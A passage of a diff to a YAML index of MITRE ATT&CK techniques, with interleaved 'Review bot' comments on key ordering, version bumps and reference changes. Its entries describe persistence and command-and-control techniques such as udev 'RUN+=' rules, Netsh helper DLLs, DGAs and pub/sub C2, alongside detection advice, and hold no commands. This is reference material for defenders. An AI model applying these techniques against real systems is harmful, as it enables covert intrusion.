Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -36303,6 +36681,7 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -36339,17 +36718,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
@@ -36395,9 +36774,65 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ atomic_tests: []
+ T1546.017:
+ technique:
+ modified: '2024-11-11T19:05:38.708Z'
+ name: Udev Rules
+ description: |-
+ Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+ Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Eduardo González Hernández (@codexlynx)
+ - Eder Pérez Ignacio, @ch4ik0
+ - Wirapong Petshagun
+ - "@grahamhelton3"
+ - Ruben Groenewoud, Elastic
+ x_mitre_deprecated: false
+ x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+ in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+ specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+ 2024) '
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'File: File Modification'
+ type: attack-pattern
+ id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+ created: '2024-09-26T17:02:09.888Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/017
+ external_id: T1546.017
+ - source_name: Ignacio Udev research 2024
+ description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+ persistence. Retrieved September 26, 2024.
+ url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+ - source_name: Elastic Linux Persistence 2024
+ description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+ - A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+ url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+ - source_name: Reichert aon sedexp 2024
+ description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+ Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+ url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.007:
technique:
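Review bot: The new T1546.017 block is spliced in so that T1556's former trailing lines `x_mitre_attack_spec_version: 3.2.0` and `x_mitre_modified_by_ref: identity--c78cb6e5-...` now close the Udev Rules object, while T1556 gets its own `atomic_tests: []` above the insertion. That is consistent only because the earlier T1556 hunks already moved both keys up after `kill_chain_phases`, so verify the regenerated YAML for T1556 explicitly rather than trusting the diff alignment. Two follow-ups: `kill_chain_phases` lists `privilege-escalation` as well as `persistence`, so the same T1546.017 block should also appear under the `privilege-escalation` key of this file; and the `x_mitre_detection` string has one unbackticked path (`/usr/lib/udev/rules.d/`) and a trailing space before the closing quote, both inherited from upstream. `atomic_tests: []` is expected for a technique this new, but it means the index entry is a placeholder until a udev-rule test is contributed.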
@@ -36434,7 +36869,7 @@ persistence:
Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh
.
Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:09:17.363Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Netsh Helper DLL'
x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -36458,51 +36893,11 @@ persistence:
- SYSTEM
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.007
atomic_tests: []
T1505.001:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Carlos Borges, @huntingneo, CIP
- - Lucas da Silva Pereira, @vulcanunsec, CIP
- - Kaspersky
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
- type: attack-pattern
- created: '2019-12-12T14:59:58.168Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36525,20 +36920,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
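Review bot: Read together with the preceding removal hunk, the T1505.001 change is mostly a key reorder; the substantive differences are `x_mitre_version` 1.0 → 1.1, `x_mitre_attack_spec_version` 2.1.0 → 3.2.0, the two NetSPI reference URLs moving to `www.netspi.com` with 2024 retrieval dates, `revoked: false` and `x_mitre_deprecated: false` being added, and `x_mitre_permissions_required` (Administrator, SYSTEM, root) being dropped. The dropped permissions list is the only loss of information in the pair of hunks; it tracks upstream's retirement of that field, but if anything in this repo filters or labels techniques by required privilege, it now needs another source for that data.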
@@ -36568,7 +37000,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36592,12 +37024,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -36681,11 +37111,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36737,9 +37166,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -36788,7 +37216,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36826,14 +37254,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36896,7 +37322,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -36954,97 +37379,95 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests: []
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
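Review bot: the 'Akamai DGA Mitigation' reference URL changes from https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html to a personal medium.com post (https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e); verify this against the upstream ATT&CK object for T1568.002 at `x_mitre_version: '1.1'` before merging rather than treating it as a deliberate relink. The same hunk silently drops `x_mitre_permissions_required: [User]` and adds `revoked: false` and `x_mitre_deprecated: false`, while techniques below (T1568, T1205.001, T1102.003) still carry `x_mitre_permissions_required`, so the object shapes in this file now differ. Because the entire object was reordered, the 97-line hunk hides that the description and detection text are unchanged; a key-ordered export would make future version bumps like '1.0' to '1.1' reviewable at a glance.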
@@ -37110,9 +37533,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
